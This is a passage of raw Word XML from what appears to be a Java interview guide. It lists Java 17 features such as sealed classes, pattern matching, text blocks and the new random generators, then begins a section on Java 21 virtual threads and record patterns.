          </w:tcPr>
          <w:p w14:paraId="3B7359A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String Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5342841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Utility methods like isBlank(), lines()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="7632220C" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EC50CDB"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andard HTTP Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="288AF6F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implified modern HTTP communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="2DFCE4FB" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C5113E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llection.toArray() Overload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D7574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collections to arrays efficiently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="77C5538D" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59E92D9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d Deprecated Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="618649A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CORBA APIs removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="4C88FB33" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6823430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un .java file directly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BCF58A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source code launcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10CF2F0F" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="0011489C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABB189E" w14:textId="77777777" w:rsidR="000F0F96" w:rsidRPr="00CE4B95" w:rsidRDefault="000F0F96" w:rsidP="0011489C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A4C343" w14:textId="77777777" w:rsidR="00E90957" w:rsidRPr="00CE4B95" w:rsidRDefault="00E90957">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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A3ACD" w14:textId="569EA8CF" w:rsidR="00E90957" w:rsidRPr="00CE4B95" w:rsidRDefault="00032852" w:rsidP="00032852">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="_Toc197867477"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java 17 Features</w:t>
      </w:r>
      <w:bookmarkEnd w:id="263"/>
    </w:p>
    <w:p w14:paraId="341BFEFD" w14:textId="1EF7D471" w:rsidR="00781DBE" w:rsidRPr="00CE4B95" w:rsidRDefault="00781DBE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="264" w:name="_Toc197867478"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java 17 features?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="264"/>
    </w:p>
    <w:p w14:paraId="3111ECE7" w14:textId="3C698953" w:rsidR="00781DBE" w:rsidRPr="00CE4B95"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C71AC2A">
          <v:rect id="_x0000_i1787" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F99FE5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Sealed Classes (Standard Feature)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BED32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restrict which classes can extend or implement them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7873C"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C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CBE629"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C646B8" w14:textId="73946A34"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040272"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 Case: Controlled inheritance for security and design clarity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE9A6C"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FE68FCA">
          <v:rect id="_x0000_i1788" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6CDE3"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Pattern Matching for instanceof (Standard Feature)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A5879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implifies type checks and casting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ADC0EA"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CE8F1F"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505CDAB5" w14:textId="3FA05C8D"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BE056"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and safer casting logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A29FF5F"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6B270BA0">
          <v:rect id="_x0000_i1789" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4836C394"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Switch Expressions (Preview earlier, now stable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F9E1A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switch to return values and have more concise syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE9A7EA"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BC8F2"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MON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art of week"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8DF6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FRI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ekend is near"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615E62A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idweek"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36946F9B" w14:textId="592C10A0"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B19C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readable and expressive control flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30787AC7"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53F5F1C2">
          <v:rect id="_x0000_i1790" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="190AE077"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Text Blocks (Introduced in Java 15, refined)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5151E3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 with better formatting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE2BBB"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j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p>
    <w:p w14:paraId="29105BC8"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739DDFFF"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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>": "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ChatGPT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA73067"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type</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AI</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF88F26"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3F8D4524" w14:textId="673AA9DB"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E6E8E"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ful for JSON, SQL, XML, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E940225"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D488A67">
          <v:rect id="_x0000_i1791" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2326FF"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ew Pseudo-Random Number Generators (JEP 356)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329BF18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rovides new interfaces and implementations for random number generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6427289B" w14:textId="77777777"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RandomGenerator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ra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Generato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64X256Mix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394BE2DC" w14:textId="2A497C01"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a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3C109D6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flexible and efficient random generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6474363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2F24C9E">
          <v:rect id="_x0000_i1792" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FB63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Foreign Function &amp; Memory API (Incubator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620F2417"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Java programs to call native code and allocate memory outside the heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E86FB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native interop without JNI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6512351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471E98B">
          <v:rect id="_x0000_i1793" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A9D9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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Enhanced NullPointerException Messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECBE66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Helpful exception messages with more context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400F4478"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Exception in thread "main" java.lang.NullPointerException: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C2958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  Cannot invoke "String.length()" because "str" is null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE1B2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debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649578B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4119506A">
          <v:rect id="_x0000_i1794" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55450FD9"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Removal/Deprecation of Legacy Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557DCBF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pplet API deprecated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56070EF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xperimental AOT and JIT compilers removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D6B93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MI Activation removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338CE48D"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32ED7F7">
          <v:rect id="_x0000_i1795" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F28C01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9. JEP 409: Sealed Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D845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Interfaces can also be sealed like classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B00510D" w14:textId="04E67276" w:rsidR="00527B24" w:rsidRPr="00CE4B95"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B2F218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371FCFF6">
          <v:rect id="_x0000_i1796" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2621EB"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CE4B95" w14:paraId="7DF53067" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13F0011A"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7966F5EB"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="5A64BC05" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="424EDF5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amp; Interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66DA290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stricts subclassing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="6EB38AF2" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="658DFAC9"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attern Matching for instanceof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12DACB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Cleaner type checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="173C64F9" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78E6510F"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witch Expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36C0A31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turn values directly from switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="1C591504" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02FA54D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Text Blocks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="589662C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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="1135268A" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2087E9F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nhanced NPE Messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19273BF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Better error diagnostics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="7686284C" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F14368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057BB973"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afe native interop (Incubator)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="12CAA3D2" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C4DC4E"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New Random Generators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0244570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lexible PRNG implementations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FBEEDDC" w14:textId="77581DFF" w:rsidR="00E90957" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6">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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="42209746">
          <v:rect id="_x0000_i1797" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00E90957" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEAA5C7" w14:textId="0757A5F7" w:rsidR="00032852" w:rsidRPr="00CE4B95" w:rsidRDefault="00032852" w:rsidP="00032852">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="265" w:name="_Toc197867479"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java 21 Features</w:t>
      </w:r>
      <w:bookmarkEnd w:id="265"/>
    </w:p>
    <w:p w14:paraId="4E354C6B" w14:textId="77777777" w:rsidR="00370A89" w:rsidRPr="00CE4B95" w:rsidRDefault="00370A89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461079A1" w14:textId="3EBF8210" w:rsidR="00301558" w:rsidRPr="00CE4B95" w:rsidRDefault="00301558">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="266" w:name="_Toc197867480"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java 21 features?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="266"/>
    </w:p>
    <w:p w14:paraId="4EE6D91A" w14:textId="14C05E07" w:rsidR="004C7B2C" w:rsidRPr="00857FCF" w:rsidRDefault="004C7B2C" w:rsidP="008874B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857FCF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00857FCF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00857FCF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Java 21 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09238D1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6E39B3E7">
          <v:rect id="_x0000_i1798" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D29AF"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Virtual Threads (JEP 444 - Final)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37451590"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that help with high-throughput concurrent applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728FD1D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Virtual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731E39"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n-blocking, lightweight task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655B2BD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a virtual thread"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E39D9A1" w14:textId="2D47BA1C"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7654B5E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scalable applications like servers and reactive systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD42442"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6B7A5CC">
          <v:rect id="_x0000_i1799" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="277FC5D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Record Patterns (JEP 440 - Final)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5254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 records more concisely in pattern matching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7734EBB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record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2B4F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24AB6A"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0D2E1"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36E59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X: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p>
    <w:p w14:paraId="0A13BD3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FF8A8D" w14:textId="596AEB3D"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BB9A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destructuring of objects in conditionals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1E7A11"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E6046C5">
          <v:rect id="_x0000_i1800" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="353D9759"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Pattern Matching for switch (JEP 441 - Final)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E3FB8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Enhances switch expressions with type patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F30A06"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orm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D44061"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6858E"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3E2E7AE4"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182D62A9"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nknown"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
